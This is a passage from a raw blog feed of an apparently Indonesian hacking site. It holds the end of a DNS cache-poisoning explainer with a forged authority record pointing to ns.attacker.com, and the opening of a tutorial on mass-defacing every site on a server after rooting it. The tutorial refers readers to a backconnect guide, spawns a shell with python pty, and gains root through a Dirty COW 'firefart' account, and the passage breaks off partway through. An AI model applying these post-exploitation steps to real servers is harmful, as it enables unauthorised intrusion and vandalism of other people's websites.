0px; padding: 0px; text-indent: 5px; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;subdomain.attacker.com. IN A&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Attacker&#39;s response :&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Answer:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(no response)&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Authority section:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;target.example. 3600 IN NS ns.attacker.com.&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Additional section:&lt;/span&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;ns.attacker.com. IN A 127.0.0.1&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;A vulnerable server would cache the unrelated authority information for target.example&#39;s &lt;b&gt;NS-record&lt;/b&gt; (nameserver entry), allowing the attacker to resolve queries to the entire suicide-db.comdomain.&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/5842959237228986519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/dns-poisoning-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5842959237228986519'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/5842959237228986519'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/07/dns-poisoning-attack.html' title='DNS Poisoning Attack'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-Kll8OMs8CNA/W0IC60I7slI/AAAAAAAAADM/hznlVfBu_XUpWHB5AeOh8bd1PbWzMiXagCLcBGAs/s72-c/DNS%2BPoisoning%2BAttack.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-3316649929829226105</id><published>2018-07-12T06:47:00.000-07:00</published><updated>2018-08-15T20:28:04.092-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Perl"/><category scheme="http://www.blogger.com/atom/ns#" term="Rooting"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Server"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Mass Deface 1 Server Setelah Root</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-fj56sXdP8yg/W0RErh3NOrI/AAAAAAAAAEI/PxygoZYAvuwBNAdOub67B0OalH4kuOXzQCLcBGAs/s1600/Rooting.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;349&quot; data-original-width=&quot;397&quot; height=&quot;562&quot; src=&quot;https://3.bp.blogspot.com/-fj56sXdP8yg/W0RErh3NOrI/AAAAAAAAAEI/PxygoZYAvuwBNAdOub67B0OalH4kuOXzQCLcBGAs/s640/Rooting.PNG&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Okay back again with me, this time I will give tutorial mass deface 1 server after rooting the server&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Okay  first we must have root access to the target server, if we can do  backconnect first as usual, if you do not know how to backconnect you  can see the tutorial here:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Read This :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; font-size: 14px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-indent: 5px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;b style=&quot;color: black; font-size: medium; line-height: normal; text-align: start; text-indent: 0px;&quot;&gt;&lt;a href=&quot;https://www.bandungdigitalsecurity.org/2018/04/tutorial-backconnect-dan-rooting-server.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;BackConnect Tutorial&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Okay if you already do backconnect next we as usual do shell spawing first by using command:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-position: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;python -c &#39;import pty; pty.spawn(&quot;/bin/­sh&quot;)&#39;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;If it is next we can login root user first&amp;nbsp;with the command&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;table 100=&quot;&quot; align=&quot;left&quot; class=&quot;code-table&quot; style=&quot;background: 0px 0px rgb(255, 255, 255); border-collapse: collapse; border: 1px rgb(153, 153, 153); box-sizing: border-box; color: #333333; font-size: 13px; line-height: 21px; outline: 0px; padding: 0px; table-layout: fixed; text-align: justify; transition: all 0.3s ease; vertical-align: baseline; width: 550px;&quot;&gt;&lt;tbody style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;tr align=&quot;left&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;th style=&quot;background: linear-gradient(rgb(1, 177, 211) 0%, rgb(33, 183, 212) 40%, rgb(63, 210, 238) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; text-align: center; text-shadow: rgba(0, 0, 0, 0.298039) 2px 4px 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: left; text-indent: 3px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background: 0px 0px; border: 0px; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Command :&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/th&gt;&lt;/tr&gt;&lt;tr style=&quot;background: 0px 0px; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;td style=&quot;background: linear-gradient(rgb(235, 236, 218) 0%, rgb(224, 224, 198) 40%, rgb(206, 206, 183) 100%); border: 1px solid rgb(153, 153, 153); box-sizing: border-box; outline: 0px; padding: 0px; transition: all 0.3s ease; vertical-align: baseline;&quot;&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;s-4&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small; line-height: normal;&quot;&gt;h&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small; line-height: normal;&quot;&gt;.1$ su&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;s-4&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small; line-height: normal;&quot;&gt;h&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small; line-height: normal;&quot;&gt;.1$ su firefart [&lt;/span&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;if you use user firefart dirty]&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div id=&quot;navbar&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border-image-outset: initial; border-image-repeat: initial; border-image-slice: initial; border-image-source: initial; border-image-width: initial; border: 0px; box-sizing: border-box; outline: 0px; padding: 0px; text-align: start; vertical-align: baseline;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: normal;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif; font-size: small;&quot;&gt;&amp;nbsp;and login with user root&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;if already entered into the root user next step you can enter into the root root first by typing commands :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br 